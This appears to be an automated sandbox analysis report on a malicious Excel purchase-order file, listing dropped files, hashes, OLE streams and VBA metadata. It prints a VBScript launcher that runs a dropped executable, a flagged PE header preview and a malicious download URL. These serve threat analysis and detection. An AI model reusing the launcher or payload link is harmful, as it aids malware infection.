                                                                SHA-256:A4C7250EBCD74226AD8A7B0398E56DFCD0DD86A7F1A46790454F4025119DC8CA
                                                                SHA-512:02EACD9F7DAA5227CA839D77B719203CCB514B8784CEF013E8CC9CB50788B145212F516905680FA5ECEC160CD87951C33F6D3A66AB513F32158280E46D717AB8
                                                                Malicious:false
                                                                Preview:......M.eFy...z@r.'m..C..[..1.+S,...X.F...Fa.q............................t...7.sB..."...6............D.CG....".u......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):512
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3::
                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                Malicious:false
                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):512
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3::
                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                Malicious:false
                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):16384
                                                                Entropy (8bit):0.179892081675338
                                                                Encrypted:false
                                                                SSDEEP:12:DCYv0BeLTZ/n/Ry4/32RcU5t6pg6xR+h:7aeLTZQ4/ecd9C
                                                                MD5:028184A607BC6A66C424D5BEADDFB56E
                                                                SHA1:335A00BE21C2CF596706B91A55A26460DA309B19
                                                                SHA-256:FC0437FE8F31D63FBF5A7D8EAD45E97C5A21211B645FA2F2F247648996738FEF
                                                                SHA-512:799647FEE5A5124DF90DBB8F5B6065A6A20FBF34792577C26588E4C1DA449ED4CFED26DF677C545BF9497BA3DF1FB3908AE2C4A474A0DF282F724ABD4A007F9A
                                                                Malicious:false
                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\AppData\Roaming\taskhostw.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):1290752
                                                                Entropy (8bit):7.269682117155447
                                                                Encrypted:false
                                                                SSDEEP:24576:WCdxte/80jYLT3U1jfsWaNuPcgCOCYdVtL/JAc/RhmTO/wQ:fw80cTsjkWaNecFOCYDljmyL
                                                                MD5:6539C2C942C9AA3AB9C7FE14FCCF0B4E
                                                                SHA1:F4A663D69419E1CDEF4D31AE003C89F6C19F23C0
                                                                SHA-256:D98FA625A92C790403EE5F8BE928948855EA23A892321CC7D219895D3F5B1C36
                                                                SHA-512:9A2141A4F2AADD4613F665CCFF25E1BE5EC4B31716F2F56982220032E688A860E28C0783626DF885ECA8F120C0C7C088B1E28438FAA6F0A1C3125BA760F8BB09
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L...c(.g..........".................J.............@.......................... .......N....@...@.......@.....................L...|....p..<(......................0q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...<(...p...*..................@..@.reloc..0q.......r...@..............@..B........................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:MS Windows 95 Internet shortcut text (URL=<https://shuvi.io/7al0eY>), ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):49
                                                                Entropy (8bit):4.680537650016895
                                                                Encrypted:false
                                                                SSDEEP:3:HRAbABGQYm2f4vMKKSEivn:HRYFVm44vM9iv
                                                                MD5:EB7E0FAAC0470CFD79B312A14B843989
                                                                SHA1:439864192FF20CA77FA7B43B072ACEF57F988D0F
                                                                SHA-256:BDA5A620F3D6D1616D4E0D466BD170C0A50F1C5480885B0484B0779AB805E9BC
                                                                SHA-512:717ADE39F988CFE2A73A90C23F43037ADC10B22360C5D86DB3A766FD9226A46D88D10AD199C8514ABE56B80B49B83F90A73C0B657F317723198BDE988123C33A
                                                                Malicious:true
                                                                Preview:[InternetShortcut]..URL=https://shuvi.io/7al0eY..
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:Generic INItialization configuration [xls]
                                                                Category:modified
                                                                Size (bytes):92
                                                                Entropy (8bit):4.6174304636438
                                                                Encrypted:false
                                                                SSDEEP:3:bDD/GXKLJdIbScOLprSmMtbScOLprSv:bfGXQJdIbSlpotbSlpI
                                                                MD5:AC9A6D12D1DD27090FA08E666CFFFD13
                                                                SHA1:35B011B39144CD196744199A1DAAD08A73445E45
                                                                SHA-256:DD3219A94741DAFAB22010302DA30618348B370EC2B765AFD45E66440FC1590A
                                                                SHA-512:CC8AC6CBDBB4DBF04CD09A5F8528A7D7C459B1394F58427F8A1FEAE7C586771AA293B85C1E282A326CDDFFF32CD8EB968153562B46E87FB05A313D1C9FF2D29E
                                                                Malicious:false
                                                                Preview:[folders]..7al0eY.url=0..shuvi.io.url=0..PO-00006799868.LNK=0..[xls]..PO-00006799868.LNK=0..
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:MS Windows 95 Internet shortcut text (URL=<https://shuvi.io/>), ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):43
                                                                Entropy (8bit):4.425810103338053
                                                                Encrypted:false
                                                                SSDEEP:3:HRAbABGQYm2f4vMKKy:HRYFVm44vMA
                                                                MD5:060F03B948441809C5912A838AF7DAD7
                                                                SHA1:92D284BA3BDB97B52A7C996101192D678133DD25
                                                                SHA-256:FAD63F404C5030F148CF8C96367AE4590265EEA6ACB0C5D944D0C665DE0C575E
                                                                SHA-512:D2DC43BF860F172DE080C66AA2417D6E99348DAF1A1D6EE5DFB7965E1990A9D2BB18D9F0272295D79328CC3FBE2FC5FD32FBB7AE9272CC3288AE25AF0A84BEB8
                                                                Malicious:true
                                                                Preview:[InternetShortcut]..URL=https://shuvi.io/..
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):162
                                                                Entropy (8bit):2.503835550707525
                                                                Encrypted:false
                                                                SSDEEP:3:vrJlaCkWtVyn5bGa/uWxCiWXhlllln:vdsCkWtib9/PhSdl
                                                                MD5:1BF7D217D8EE7C7A29943959D1D47B61
                                                                SHA1:A70BEE6CD9AD6550D00223C6255D45E60AACB23E
                                                                SHA-256:AA58A5C81D40DF3D595D132FB33B003CD754D13B19624B1008807C803D89BFFE
                                                                SHA-512:47D0F3270189629CA6499973854FC7F00A1843891C9D82B9C5AB95BE455A079D3990C1D2CCA8E3B3A102E10146FB118EDD44B58A7B7701D5A0B88A4E66200FFD
                                                                Malicious:false
                                                                Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                Process:C:\Users\user\AppData\Local\directory\name.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):268
                                                                Entropy (8bit):3.432515153875934
                                                                Encrypted:false
                                                                SSDEEP:6:DMM8lfm3OOQdUfcltr1UEZ+lX1Al1AE6nriIM8lfQVn:DsO+vNlZ1Q1A1z4mA2n
                                                                MD5:56B963F73C0E43390FF3FF4D7A017676
                                                                SHA1:3B13AC1CF25CDDF48309FC03DAE0C21E501BE72D
                                                                SHA-256:894FD00EC8DF7058794232AEEB64467BC91FE4009F18FA1407E09E92444A9EE0
                                                                SHA-512:38D55BAD2C2EB6C764D036238AC2E220B9444C98F41857799C2316B25AC8BB6C4500E43D362DFFFDF7583858D7C553CF2F11D38962F0BBEC7618B6FA6C71F9F8
                                                                Malicious:true
                                                                Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.d.i.r.e.c.t.o.r.y.\.n.a.m.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...
                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):1290752
                                                                Entropy (8bit):7.269682117155447
                                                                Encrypted:false
                                                                SSDEEP:24576:WCdxte/80jYLT3U1jfsWaNuPcgCOCYdVtL/JAc/RhmTO/wQ:fw80cTsjkWaNecFOCYDljmyL
                                                                MD5:6539C2C942C9AA3AB9C7FE14FCCF0B4E
                                                                SHA1:F4A663D69419E1CDEF4D31AE003C89F6C19F23C0
                                                                SHA-256:D98FA625A92C790403EE5F8BE928948855EA23A892321CC7D219895D3F5B1C36
                                                                SHA-512:9A2141A4F2AADD4613F665CCFF25E1BE5EC4B31716F2F56982220032E688A860E28C0783626DF885ECA8F120C0C7C088B1E28438FAA6F0A1C3125BA760F8BB09
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L...c(.g..........".................J.............@.......................... .......N....@...@.......@.....................L...|....p..<(......................0q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...<(...p...*..................@..@.reloc..0q.......r...@..............@..B........................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Sat Oct 12 15:40:15 2024, Security: 1
                                                                Category:dropped
                                                                Size (bytes):1101824
                                                                Entropy (8bit):7.299868576453754
                                                                Encrypted:false
                                                                SSDEEP:12288:xmzHJEHAfwu4hnD3DERnLRmF8DNRrf1T3dCduCVltqMEV+qA/FtYCZt1gF2gSk:gLw/hnbARM8/B3WV/qzoHdHF
                                                                MD5:671C8C03CD14C8E905CBE2AD01B69DB4
                                                                SHA1:C49221E5EAA1FF64301935B7C6530DC4139CFE70
                                                                SHA-256:96372300B4C77CCA71146360FCC6E3B556B842CC485785F918041B37062F347D
                                                                SHA-512:96F499EBFF46255B6123D5835A8267DC60E00141FB3F54D6579865E6BBEA8ED315C6B468805B8668A46D2D06F0D09E7168EA8DEE2F5BE5A9CB8A2593D24C49D0
                                                                Malicious:false
                                                                Preview:......................>...............................................................................;.......................h.......j................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):26
                                                                Entropy (8bit):3.95006375643621
                                                                Encrypted:false
                                                                SSDEEP:3:ggPYV:rPYV
                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                Malicious:false
                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Sat Oct 12 15:40:15 2024, Security: 1
                                                                Category:dropped
                                                                Size (bytes):1101824
                                                                Entropy (8bit):7.299868576453754
                                                                Encrypted:false
                                                                SSDEEP:12288:xmzHJEHAfwu4hnD3DERnLRmF8DNRrf1T3dCduCVltqMEV+qA/FtYCZt1gF2gSk:gLw/hnbARM8/B3WV/qzoHdHF
                                                                MD5:671C8C03CD14C8E905CBE2AD01B69DB4
                                                                SHA1:C49221E5EAA1FF64301935B7C6530DC4139CFE70
                                                                SHA-256:96372300B4C77CCA71146360FCC6E3B556B842CC485785F918041B37062F347D
                                                                SHA-512:96F499EBFF46255B6123D5835A8267DC60E00141FB3F54D6579865E6BBEA8ED315C6B468805B8668A46D2D06F0D09E7168EA8DEE2F5BE5A9CB8A2593D24C49D0
                                                                Malicious:true
                                                                Preview:......................>...............................................................................;.......................h.......j................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Oct 10 12:40:54 2024, Security: 1
                                                                Entropy (8bit):7.26432946204488
                                                                TrID:
                                                                • Microsoft Excel sheet (30009/1) 47.99%
                                                                • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                File name:PO-00006799868.xls
                                                                File size:1'094'656 bytes
                                                                MD5:e78662c0ecb1a705f3f16366cff45409
                                                                SHA1:0de40063c9028a33b77d4cb3de06dec0f705059b
                                                                SHA256:33c790e2db3f22fbd80c43a82837b5fb7a0f4a317b25dbab1e984baf95fa82bc
                                                                SHA512:21a144950245cfeb4c616ab3e15889a04811839d3b0a288193678ee8bf6ba14c2ce81fc67c57d57d4a20e1e3b9ae06f88009437de435ab0380f55689805432c4
                                                                SSDEEP:12288:ZmzHJEHAfwu4heD3DERnLRmF8DLPrf1H3dzFuFBAn0aIGZf12e5wyowAkiR9GnOp:4Lw/hebARM8Th3OA5qgq3/pp
                                                                TLSH:A135CE83EA1D4F62CE41423466F7173A17249C43D622832F22F5772839FBAD06956FAD
                                                                File Content Preview:........................>...............................................................................<.......................i.......k......................................................................................................................
                                                                Icon Hash:276ea3a6a6b7bfbf
                                                                Document Type:OLE
                                                                Number of OLE Files:1
                                                                Has Summary Info:
                                                                Application Name:Microsoft Excel
                                                                Encrypted Document:True
                                                                Contains Word Document Stream:False
                                                                Contains Workbook/Book Stream:True
                                                                Contains PowerPoint Document Stream:False
                                                                Contains Visio Document Stream:False
                                                                Contains ObjectPool Stream:False
                                                                Flash Objects Count:0
                                                                Contains VBA Macros:True
                                                                Code Page:1252
                                                                Author:
                                                                Last Saved By:
                                                                Create Time:2006-09-16 00:00:00
                                                                Last Saved Time:2024-10-10 11:40:54
                                                                Creating Application:Microsoft Excel
                                                                Security:1
                                                                Document Code Page:1252
                                                                Thumbnail Scaling Desired:False
                                                                Contains Dirty Links:False
                                                                Shared Document:False
                                                                Changed Hyperlinks:False
                                                                Application Version:786432
                                                                General
                                                                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                VBA File Name:Sheet1.cls
                                                                Stream Size:977
                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . I f " . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 49 66 f2 22 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Attribute VB_Name = "Sheet1"
                                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                Attribute VB_GlobalNameSpace = False
                                                                Attribute VB_Creatable = False
                                                                Attribute VB_PredeclaredId = True
                                                                Attribute VB_Exposed = True
                                                                Attribute VB_TemplateDerived = False
                                                                Attribute VB_Customizable = True
                                                                

                                                                General
                                                                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                VBA File Name:Sheet2.cls
                                                                Stream Size:977
                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . I f . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 49 66 8f a2 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Attribute VB_Name = "Sheet2"
                                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                Attribute VB_GlobalNameSpace = False
                                                                Attribute VB_Creatable = False
                                                                Attribute VB_PredeclaredId = True
                                                                Attribute VB_Exposed = True
                                                                Attribute VB_TemplateDerived = False
                                                                Attribute VB_Customizable = True
                                                                

                                                                General
                                                                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                VBA File Name:Sheet3.cls
                                                                Stream Size:977
                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . I f ] Y . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 .
                                                                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 49 66 5d 59 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Attribute VB_Name = "Sheet3"
                                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                Attribute VB_GlobalNameSpace = False
                                                                Attribute VB_Creatable = False
                                                                Attribute VB_PredeclaredId = True
                                                                Attribute VB_Exposed = True
                                                                Attribute VB_TemplateDerived = False
                                                                Attribute VB_Customizable = True
                                                                

                                                                General
                                                                Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                VBA File Name:ThisWorkbook.cls
                                                                Stream Size:985
                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . I f . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                                                                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 49 66 a0 87 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Attribute VB_Name = "ThisWorkbook"
                                                                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                Attribute VB_GlobalNameSpace = False
                                                                Attribute VB_Creatable = False
                                                                Attribute VB_PredeclaredId = True
                                                                Attribute VB_Exposed = True
                                                                Attribute VB_TemplateDerived = False
                                                                Attribute VB_Customizable = True
                                                                

                                                                General
                                                                Stream Path:\x1CompObj
                                                                CLSID:
                                                                File Type:data
                                                                Stream Size:114
                                                                Entropy:4.25248375192737
                                                                Base64 Encoded:True
                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                General
                                                                Stream Path:\x5DocumentSummaryInformation
                                                                CLSID:
                                                                File Type:data
                                                                Stream Size:244
                                                                Entropy:2.889430592781307
                                                                Base64 Encoded:False
                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                                General
                                                                Stream Path:\x5SummaryInformation
                                                                CLSID:
                                                                File Type:data
                                                                Stream Size:200
                                                                Entropy:3.250350317504982
                                                                Base64 Encoded:False
                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . ' C . . . . . . . . . . .
                                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                                General
                                                                Stream Path:MBD0043CF7E/\x1CompObj
                                                                CLSID:
                                                                File Type:data
                                                                Stream Size:114
                                                                Entropy:4.25248375192737
                                                                Base64 Encoded:True
                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                General
                                                                Stream Path:MBD0043CF7E/\x5DocumentSummaryInformation
                                                                CLSID:
                                                                File Type:data
                                                                Stream Size:244
                                                                Entropy:2.701136490257069
                                                                Base64 Encoded:False
                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
                                                                General
                                                                Stream Path:MBD0043CF7E/\x5SummaryInformation
                                                                CLSID:
